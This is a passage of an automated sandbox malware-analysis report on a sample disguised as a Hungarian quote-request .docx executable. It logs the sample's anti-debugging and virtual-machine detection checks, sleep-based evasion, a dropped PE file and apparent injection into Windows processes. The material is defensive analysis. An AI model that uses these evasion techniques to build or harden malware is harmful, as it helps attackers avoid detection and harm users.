          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: B89904 second address: B8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: B89B7E second address: B89B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047C9AB0 rdtsc 5_2_047C9AB0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9763Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 1485Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 8487Jump to behavior
          Source: C:\Windows\SysWOW64\esentutl.exeDropped PE file which has not been started: C:\Users\Public\xpha.pifJump to dropped file
          Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 2.0 %
          Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 1.4 %
          Source: C:\Windows\explorer.exe TID: 4464Thread sleep count: 9763 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4464Thread sleep time: -19526000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4464Thread sleep count: 181 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4464Thread sleep time: -362000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2180Thread sleep count: 1485 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2180Thread sleep time: -2970000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2180Thread sleep count: 8487 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2180Thread sleep time: -16974000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029A5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029A5908
          Source: explorer.exe, 00000006.00000000.1802889312.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000000.1799656853.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000006.00000000.1799656853.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000006.00000000.1802889312.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000000.1787918751.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000006.00000000.1802889312.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000006.00000000.1799656853.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.0000000000597000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.000000000057F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107012452.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107012452.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000000.1802889312.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000006.00000003.3492560819.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106881820.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000006.00000000.1787918751.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000000.1799656853.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000006.00000000.1787918751.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeAPI call chain: ExitProcess graph end nodegraph_0-32496
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_029BF744
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047C9AB0 rdtsc 5_2_047C9AB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_365D2E80
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_029B894C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3662D660 mov eax, dword ptr fs:[00000030h]5_2_3662D660
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C9660 mov eax, dword ptr fs:[00000030h]5_2_365C9660
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C9660 mov eax, dword ptr fs:[00000030h]5_2_365C9660
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36593616 mov eax, dword ptr fs:[00000030h]5_2_36593616
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36593616 mov eax, dword ptr fs:[00000030h]5_2_36593616
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665636 mov eax, dword ptr fs:[00000030h]5_2_36665636
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C1607 mov eax, dword ptr fs:[00000030h]5_2_365C1607
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CF603 mov eax, dword ptr fs:[00000030h]5_2_365CF603
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F626 mov eax, dword ptr fs:[00000030h]5_2_3658F626
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F626 mov eax, dword ptr fs:[00000030h]5_2_3658F626
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F626 mov eax, dword ptr fs:[00000030h]5_2_3658F626
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F626 mov eax, dword ptr fs:[00000030h]5_2_3658F626
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F626 mov eax, dword ptr fs:[00000030h]5_2_3658F626
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F626 mov eax, dword ptr fs:[00000030h]5_2_3658F626
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F626 mov eax, dword ptr fs:[00000030h]5_2_3658F626
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F626 mov eax, dword ptr fs:[00000030h]5_2_3658F626
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F626 mov eax, dword ptr fs:[00000030h]5_2_3658F626
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366236EE mov eax, dword ptr fs:[00000030h]5_2_366236EE
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366236EE mov eax, dword ptr fs:[00000030h]5_2_366236EE
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366236EE mov eax, dword ptr fs:[00000030h]5_2_366236EE
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366236EE mov eax, dword ptr fs:[00000030h]5_2_366236EE
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366236EE mov eax, dword ptr fs:[00000030h]5_2_366236EE
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366236EE mov eax, dword ptr fs:[00000030h]5_2_366236EE
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C16CF mov eax, dword ptr fs:[00000030h]5_2_365C16CF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664D6F0 mov eax, dword ptr fs:[00000030h]5_2_3664D6F0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B6C0 mov eax, dword ptr fs:[00000030h]5_2_3659B6C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B6C0 mov eax, dword ptr fs:[00000030h]5_2_3659B6C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B6C0 mov eax, dword ptr fs:[00000030h]5_2_3659B6C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B6C0 mov eax, dword ptr fs:[00000030h]5_2_3659B6C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B6C0 mov eax, dword ptr fs:[00000030h]5_2_3659B6C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B6C0 mov eax, dword ptr fs:[00000030h]5_2_3659B6C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F6C7 mov eax, dword ptr fs:[00000030h]5_2_3664F6C7
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366516CC mov eax, dword ptr fs:[00000030h]5_2_366516CC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366516CC mov eax, dword ptr fs:[00000030h]5_2_366516CC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366516CC mov eax, dword ptr fs:[00000030h]5_2_366516CC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366516CC mov eax, dword ptr fs:[00000030h]5_2_366516CC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BD6E0 mov eax, dword ptr fs:[00000030h]5_2_365BD6E0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BD6E0 mov eax, dword ptr fs:[00000030h]5_2_365BD6E0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365876B2 mov eax, dword ptr fs:[00000030h]5_2_365876B2
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365876B2 mov eax, dword ptr fs:[00000030h]5_2_365876B2
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365876B2 mov eax, dword ptr fs:[00000030h]5_2_365876B2
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661368C mov eax, dword ptr fs:[00000030h]5_2_3661368C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661368C mov eax, dword ptr fs:[00000030h]5_2_3661368C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661368C mov eax, dword ptr fs:[00000030h]5_2_3661368C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661368C mov eax, dword ptr fs:[00000030h]5_2_3661368C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658D6AA mov eax, dword ptr fs:[00000030h]5_2_3658D6AA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658D6AA mov eax, dword ptr fs:[00000030h]5_2_3658D6AA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A3740 mov eax, dword ptr fs:[00000030h]5_2_365A3740
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A3740 mov eax, dword ptr fs:[00000030h]5_2_365A3740
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A3740 mov eax, dword ptr fs:[00000030h]5_2_365A3740
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36663749 mov eax, dword ptr fs:[00000030h]5_2_36663749
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663375F mov eax, dword ptr fs:[00000030h]5_2_3663375F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663375F mov eax, dword ptr fs:[00000030h]5_2_3663375F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663375F mov eax, dword ptr fs:[00000030h]5_2_3663375F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663375F mov eax, dword ptr fs:[00000030h]5_2_3663375F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663375F mov eax, dword ptr fs:[00000030h]5_2_3663375F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B765 mov eax, dword ptr fs:[00000030h]5_2_3658B765
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B765 mov eax, dword ptr fs:[00000030h]5_2_3658B765
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B765 mov eax, dword ptr fs:[00000030h]5_2_3658B765
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B765 mov eax, dword ptr fs:[00000030h]5_2_3658B765
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CF71F mov eax, dword ptr fs:[00000030h]5_2_365CF71F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CF71F mov eax, dword ptr fs:[00000030h]5_2_365CF71F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F72E mov eax, dword ptr fs:[00000030h]5_2_3664F72E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665972B mov eax, dword ptr fs:[00000030h]5_2_3665972B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3666B73C mov eax, dword ptr fs:[00000030h]5_2_3666B73C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3666B73C mov eax, dword ptr fs:[00000030h]5_2_3666B73C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3666B73C mov eax, dword ptr fs:[00000030h]5_2_3666B73C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3666B73C mov eax, dword ptr fs:[00000030h]5_2_3666B73C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36597703 mov eax, dword ptr fs:[00000030h]5_2_36597703
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36595702 mov eax, dword ptr fs:[00000030h]5_2_36595702
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36595702 mov eax, dword ptr fs:[00000030h]5_2_36595702
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659973A mov eax, dword ptr fs:[00000030h]5_2_3659973A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659973A mov eax, dword ptr fs:[00000030h]5_2_3659973A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589730 mov eax, dword ptr fs:[00000030h]5_2_36589730
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589730 mov eax, dword ptr fs:[00000030h]5_2_36589730
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C5734 mov eax, dword ptr fs:[00000030h]5_2_365C5734
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36593720 mov eax, dword ptr fs:[00000030h]5_2_36593720
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AF720 mov eax, dword ptr fs:[00000030h]5_2_365AF720
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AF720 mov eax, dword ptr fs:[00000030h]5_2_365AF720
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AF720 mov eax, dword ptr fs:[00000030h]5_2_365AF720
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365957C0 mov eax, dword ptr fs:[00000030h]5_2_365957C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365957C0 mov eax, dword ptr fs:[00000030h]5_2_365957C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365957C0 mov eax, dword ptr fs:[00000030h]5_2_365957C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D7E0 mov ecx, dword ptr fs:[00000030h]5_2_3659D7E0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366197A9 mov eax, dword ptr fs:[00000030h]5_2_366197A9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661F7AF mov eax, dword ptr fs:[00000030h]5_2_3661F7AF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661F7AF mov eax, dword ptr fs:[00000030h]5_2_3661F7AF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661F7AF mov eax, dword ptr fs:[00000030h]5_2_3661F7AF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661F7AF mov eax, dword ptr fs:[00000030h]5_2_3661F7AF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661F7AF mov eax, dword ptr fs:[00000030h]5_2_3661F7AF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366637B6 mov eax, dword ptr fs:[00000030h]5_2_366637B6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664D7B0 mov eax, dword ptr fs:[00000030h]5_2_3664D7B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664D7B0 mov eax, dword ptr fs:[00000030h]5_2_3664D7B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F7BA mov eax, dword ptr fs:[00000030h]5_2_3658F7BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F7BA mov eax, dword ptr fs:[00000030h]5_2_3658F7BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F7BA mov eax, dword ptr fs:[00000030h]5_2_3658F7BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F7BA mov eax, dword ptr fs:[00000030h]5_2_3658F7BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F7BA mov eax, dword ptr fs:[00000030h]5_2_3658F7BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F7BA mov eax, dword ptr fs:[00000030h]5_2_3658F7BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F7BA mov eax, dword ptr fs:[00000030h]5_2_3658F7BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F7BA mov eax, dword ptr fs:[00000030h]5_2_3658F7BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F7BA mov eax, dword ptr fs:[00000030h]5_2_3658F7BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BD7B0 mov eax, dword ptr fs:[00000030h]5_2_365BD7B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F78A mov eax, dword ptr fs:[00000030h]5_2_3664F78A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B440 mov eax, dword ptr fs:[00000030h]5_2_3659B440
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B440 mov eax, dword ptr fs:[00000030h]5_2_3659B440
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B440 mov eax, dword ptr fs:[00000030h]5_2_3659B440
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B440 mov eax, dword ptr fs:[00000030h]5_2_3659B440
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B440 mov eax, dword ptr fs:[00000030h]5_2_3659B440
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659B440 mov eax, dword ptr fs:[00000030h]5_2_3659B440
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3666547F mov eax, dword ptr fs:[00000030h]5_2_3666547F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663B450 mov eax, dword ptr fs:[00000030h]5_2_3663B450
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663B450 mov eax, dword ptr fs:[00000030h]5_2_3663B450
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663B450 mov eax, dword ptr fs:[00000030h]5_2_3663B450
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663B450 mov eax, dword ptr fs:[00000030h]5_2_3663B450
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F453 mov eax, dword ptr fs:[00000030h]5_2_3664F453
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591460 mov eax, dword ptr fs:[00000030h]5_2_36591460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591460 mov eax, dword ptr fs:[00000030h]5_2_36591460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591460 mov eax, dword ptr fs:[00000030h]5_2_36591460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591460 mov eax, dword ptr fs:[00000030h]5_2_36591460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591460 mov eax, dword ptr fs:[00000030h]5_2_36591460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AF460 mov eax, dword ptr fs:[00000030h]5_2_365AF460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AF460 mov eax, dword ptr fs:[00000030h]5_2_365AF460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AF460 mov eax, dword ptr fs:[00000030h]5_2_365AF460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AF460 mov eax, dword ptr fs:[00000030h]5_2_365AF460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AF460 mov eax, dword ptr fs:[00000030h]5_2_365AF460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AF460 mov eax, dword ptr fs:[00000030h]5_2_365AF460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B340D mov eax, dword ptr fs:[00000030h]5_2_365B340D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36617410 mov eax, dword ptr fs:[00000030h]5_2_36617410
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366394E0 mov eax, dword ptr fs:[00000030h]5_2_366394E0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366654DB mov eax, dword ptr fs:[00000030h]5_2_366654DB
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366374B0 mov eax, dword ptr fs:[00000030h]5_2_366374B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B480 mov eax, dword ptr fs:[00000030h]5_2_3658B480
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36599486 mov eax, dword ptr fs:[00000030h]5_2_36599486
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36599486 mov eax, dword ptr fs:[00000030h]5_2_36599486
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365874B0 mov eax, dword ptr fs:[00000030h]5_2_365874B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365874B0 mov eax, dword ptr fs:[00000030h]5_2_365874B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C34B0 mov eax, dword ptr fs:[00000030h]5_2_365C34B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CB570 mov eax, dword ptr fs:[00000030h]5_2_365CB570
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CB570 mov eax, dword ptr fs:[00000030h]5_2_365CB570
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663B550 mov eax, dword ptr fs:[00000030h]5_2_3663B550
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663B550 mov eax, dword ptr fs:[00000030h]5_2_3663B550
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663B550 mov eax, dword ptr fs:[00000030h]5_2_3663B550
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B562 mov eax, dword ptr fs:[00000030h]5_2_3658B562
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663F525 mov eax, dword ptr fs:[00000030h]5_2_3663F525
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663F525 mov eax, dword ptr fs:[00000030h]5_2_3663F525
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663F525 mov eax, dword ptr fs:[00000030h]5_2_3663F525
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663F525 mov eax, dword ptr fs:[00000030h]5_2_3663F525
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663F525 mov eax, dword ptr fs:[00000030h]5_2_3663F525
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663F525 mov eax, dword ptr fs:[00000030h]5_2_3663F525
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663F525 mov eax, dword ptr fs:[00000030h]5_2_3663F525
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664B52F mov eax, dword ptr fs:[00000030h]5_2_3664B52F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665537 mov eax, dword ptr fs:[00000030h]5_2_36665537
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C7505 mov eax, dword ptr fs:[00000030h]5_2_365C7505
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C7505 mov ecx, dword ptr fs:[00000030h]5_2_365C7505
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CD530 mov eax, dword ptr fs:[00000030h]5_2_365CD530
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CD530 mov eax, dword ptr fs:[00000030h]5_2_365CD530
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
